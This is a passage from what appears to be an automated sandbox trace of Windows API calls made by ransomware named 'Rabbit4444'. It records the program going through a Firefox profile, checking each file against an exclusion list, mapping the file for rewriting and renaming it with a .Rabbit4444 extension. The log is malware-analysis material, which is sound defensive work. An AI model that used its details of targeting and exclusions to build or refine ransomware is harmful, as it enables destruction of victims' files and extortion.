out: hHeap=0xe0000) returned 1 [0051.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0051.854] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14316496411) returned 1 [0051.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0051.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0051.854] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.855] CloseHandle (hObject=0x298) returned 1 [0051.855] CloseHandle (hObject=0x278) returned 1 [0051.855] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js.Rabbit4444") returned 100 [0051.855] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore.js"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore.js.rabbit4444"), dwFlags=0x1) returned 1 [0051.855] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143f0f49, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x143f0f49, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SiteSecurityServiceState.txt", cAlternateFileName="SITESE~1.TXT")) returned 1 [0051.855] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.855] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.855] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="Rabbit4444.exe") returned 1 [0051.855] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2=".") returned 1 [0051.855] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="..") returned 1 [0051.855] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="windows") returned -1 [0051.855] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="bootmgr") returned 1 [0051.855] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="pagefile.sys") returned 1 [0051.855] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="boot") returned 1 [0051.856] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="ids.txt") returned 1 [0051.856] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="NTUSER.DAT") returned 1 [0051.856] lstrcpyW (in: lpString1=0x130ebcc, lpString2="SiteSecurityServiceState.txt" | out: lpString1="SiteSecurityServiceState.txt") returned="SiteSecurityServiceState.txt" [0051.856] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt", dwFileAttributes=0x0) returned 1 [0051.856] lstrlenW (lpString="SiteSecurityServiceState.txt") returned 28 [0051.856] lstrlenW (lpString="Rabbit4444") returned 10 [0051.856] lstrcmpiW (lpString1="eState.txt", lpString2="Rabbit4444") returned -1 [0051.856] lstrlenW (lpString=".dll") returned 4 [0051.856] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0051.856] lstrlenW (lpString=".lnk") returned 4 [0051.856] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0051.856] lstrlenW (lpString=".ini") returned 4 [0051.856] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0051.857] lstrlenW (lpString=".sys") returned 4 [0051.857] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0051.857] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sitesecurityservicestate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.857] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.857] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14316752458) returned 1 [0051.857] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1822) returned 1 [0051.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0051.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0051.857] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa20, lpName=0x0) returned 0x298 [0051.858] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa20) returned 0x70000 [0051.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0051.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0051.860] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0051.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0051.860] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14317071436) returned 1 [0051.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0051.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0051.860] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.860] CloseHandle (hObject=0x298) returned 1 [0051.860] CloseHandle (hObject=0x278) returned 1 [0051.860] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt.Rabbit4444") returned 113 [0051.860] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sitesecurityservicestate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sitesecurityservicestate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0051.861] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c1abf, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c1abf, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x23c2e4c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="storage", cAlternateFileName="")) returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2="Rabbit4444.exe") returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2=".") returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2="..") returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2="windows") returned -1 [0051.861] lstrcmpiW (lpString1="storage", lpString2="bootmgr") returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2="pagefile.sys") returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2="boot") returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2="ids.txt") returned 1 [0051.861] lstrcmpiW (lpString1="storage", lpString2="NTUSER.DAT") returned 1 [0051.861] lstrcpyW (in: lpString1=0x130ebcc, lpString2="storage" | out: lpString1="storage") returned="storage" [0051.861] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0051.861] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x119208 [0051.861] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6930 [0051.861] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f76d02, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x1f76d02, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x22b9f22, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="storage.sqlite", cAlternateFileName="STORAG~1.SQL")) returned 1 [0051.861] lstrcmpiW (lpString1="storage.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.861] lstrcmpiW (lpString1="storage.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.861] lstrcmpiW (lpString1="storage.sqlite", lpString2="Rabbit4444.exe") returned 1 [0051.861] lstrcmpiW (lpString1="storage.sqlite", lpString2=".") returned 1 [0051.861] lstrcmpiW (lpString1="storage.sqlite", lpString2="..") returned 1 [0051.861] lstrcmpiW (lpString1="storage.sqlite", lpString2="windows") returned -1 [0051.861] lstrcmpiW (lpString1="storage.sqlite", lpString2="bootmgr") returned 1 [0051.862] lstrcmpiW (lpString1="storage.sqlite", lpString2="pagefile.sys") returned 1 [0051.862] lstrcmpiW (lpString1="storage.sqlite", lpString2="boot") returned 1 [0051.862] lstrcmpiW (lpString1="storage.sqlite", lpString2="ids.txt") returned 1 [0051.862] lstrcmpiW (lpString1="storage.sqlite", lpString2="NTUSER.DAT") returned 1 [0051.862] lstrcpyW (in: lpString1=0x130ebcc, lpString2="storage.sqlite" | out: lpString1="storage.sqlite") returned="storage.sqlite" [0051.862] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite", dwFileAttributes=0x0) returned 1 [0051.862] lstrlenW (lpString="storage.sqlite") returned 14 [0051.862] lstrlenW (lpString="Rabbit4444") returned 10 [0051.862] lstrcmpiW (lpString1="age.sqlite", lpString2="Rabbit4444") returned -1 [0051.862] lstrlenW (lpString=".dll") returned 4 [0051.862] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0051.862] lstrlenW (lpString=".lnk") returned 4 [0051.862] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0051.862] lstrlenW (lpString=".ini") returned 4 [0051.862] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0051.862] lstrlenW (lpString=".sys") returned 4 [0051.862] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0051.862] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.862] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.862] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14317312475) returned 1 [0051.862] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=512) returned 1 [0051.862] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0051.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0051.863] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500, lpName=0x0) returned 0x298 [0051.864] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x500) returned 0x70000 [0051.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0051.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0051.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0051.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0051.865] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14317619405) returned 1 [0051.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0051.866] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0051.866] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.866] CloseHandle (hObject=0x298) returned 1 [0051.866] CloseHandle (hObject=0x278) returned 1 [0051.866] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite.Rabbit4444") returned 99 [0051.866] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0051.866] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="times.json", cAlternateFileName="TIMES~1.JSO")) returned 1 [0051.866] lstrcmpiW (lpString1="times.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.866] lstrcmpiW (lpString1="times.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.866] lstrcmpiW (lpString1="times.json", lpString2="Rabbit4444.exe") returned 1 [0051.866] lstrcmpiW (lpString1="times.json", lpString2=".") returned 1 [0051.866] lstrcmpiW (lpString1="times.json", lpString2="..") returned 1 [0051.866] lstrcmpiW (lpString1="times.json", lpString2="windows") returned -1 [0051.866] lstrcmpiW (lpString1="times.json", lpString2="bootmgr") returned 1 [0051.866] lstrcmpiW (lpString1="times.json", lpString2="pagefile.sys") returned 1 [0051.866] lstrcmpiW (lpString1="times.json", lpString2="boot") returned 1 [0051.867] lstrcmpiW (lpString1="times.json", lpString2="ids.txt") returned 1 [0051.867] lstrcmpiW (lpString1="times.json", lpString2="NTUSER.DAT") returned 1 [0051.867] lstrcpyW (in: lpString1=0x130ebcc, lpString2="times.json" | out: lpString1="times.json") returned="times.json" [0051.867] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json", dwFileAttributes=0x0) returned 1 [0051.867] lstrlenW (lpString="times.json") returned 10 [0051.867] lstrlenW (lpString="Rabbit4444") returned 10 [0051.867] lstrcmpiW (lpString1="times.json", lpString2="Rabbit4444") returned 1 [0051.867] lstrlenW (lpString=".dll") returned 4 [0051.867] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0051.867] lstrlenW (lpString=".lnk") returned 4 [0051.867] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0051.867] lstrlenW (lpString=".ini") returned 4 [0051.867] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0051.867] lstrlenW (lpString=".sys") returned 4 [0051.867] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0051.867] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\times.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.867] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.867] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14317803275) returned 1 [0051.867] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=29) returned 1 [0051.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0051.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0051.867] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x298 [0051.869] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x70000 [0051.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0051.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0051.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0051.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0051.870] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14318099264) returned 1 [0051.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0051.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0051.870] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.870] CloseHandle (hObject=0x298) returned 1 [0051.870] CloseHandle (hObject=0x278) returned 1 [0051.871] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json.Rabbit4444") returned 95 [0051.871] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\times.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\times.json.rabbit4444"), dwFlags=0x1) returned 1 [0051.871] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bd1119, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2bd1119, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb8239875, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Rabbit4444.exe") returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2=".") returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="..") returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="windows") returned -1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="bootmgr") returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="pagefile.sys") returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="boot") returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ids.txt") returned 1 [0051.871] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="NTUSER.DAT") returned 1 [0051.871] lstrcpyW (in: lpString1=0x130ebcc, lpString2="webappsstore.sqlite" | out: lpString1="webappsstore.sqlite") returned="webappsstore.sqlite" [0051.871] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite", dwFileAttributes=0x0) returned 1 [0051.872] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0051.872] lstrlenW (lpString="Rabbit4444") returned 10 [0051.872] lstrcmpiW (lpString1="ore.sqlite", lpString2="Rabbit4444") returned -1 [0051.872] lstrlenW (lpString=".dll") returned 4 [0051.872] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0051.872] lstrlenW (lpString=".lnk") returned 4 [0051.872] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0051.872] lstrlenW (lpString=".ini") returned 4 [0051.872] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0051.872] lstrlenW (lpString=".sys") returned 4 [0051.872] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0051.872] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\webappsstore.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.872] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.872] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14318282198) returned 1 [0051.872] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=98304) returned 1 [0051.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0051.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0051.872] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18300, lpName=0x0) returned 0x298 [0051.873] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18300) returned 0x70000 [0051.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0051.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0051.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0051.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0051.881] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14319163515) returned 1 [0051.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0051.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0051.881] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.882] CloseHandle (hObject=0x298) returned 1 [0051.882] CloseHandle (hObject=0x278) returned 1 [0051.882] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite.Rabbit4444") returned 104 [0051.882] MoveFileExW 